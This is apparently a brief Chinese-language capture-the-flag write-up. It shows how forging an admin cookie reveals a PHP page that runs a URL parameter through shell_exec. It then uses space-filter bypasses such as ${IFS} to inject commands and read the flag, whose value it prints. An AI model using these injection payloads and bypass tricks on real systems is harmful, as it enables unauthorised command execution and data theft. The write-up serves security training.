0×01
打开题目环境,直接看重要代码
if($_COOKIE['admin']==1)
{
include "../next.php";
}
发现只有当COOKIE中admin的值等于1才可以执行下一步命令,跳出下一个文件。
0×02
打开题目环境,使用burp进行抓包,在抓包信息中,添加如下代码:
COOKIE:admin=1
Forward重放
在环境中发现新的PHP文件
rasalghul.php
url/rasalghul.php进行访问
发现PHP代码
if (isset($_GET['url'])) {
$ip=$_GET['url'];
if(preg_match("/ /", $ip)){
die('nonono');
}
$a = shell_exec($ip);
echo $a;
}
给了一个参数url,发现还需要进行空格绕过。
常用的绕过方法
cat flag.txt
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
使用url=ls${IFS}查看根目录下的文件
url/rasalghul.php/?url=ls${IFS}
发现可疑文件flllllaaaaaaggggggg,疑似flag
构造payload并进行空格绕过,读取flag
url/rasalghul.php/?url=cat${IFS}$1/flllllaaaaaaggggggg
回显flag
NSSCTF{74e32ff7-033e-4262-887f-06968c36d204}
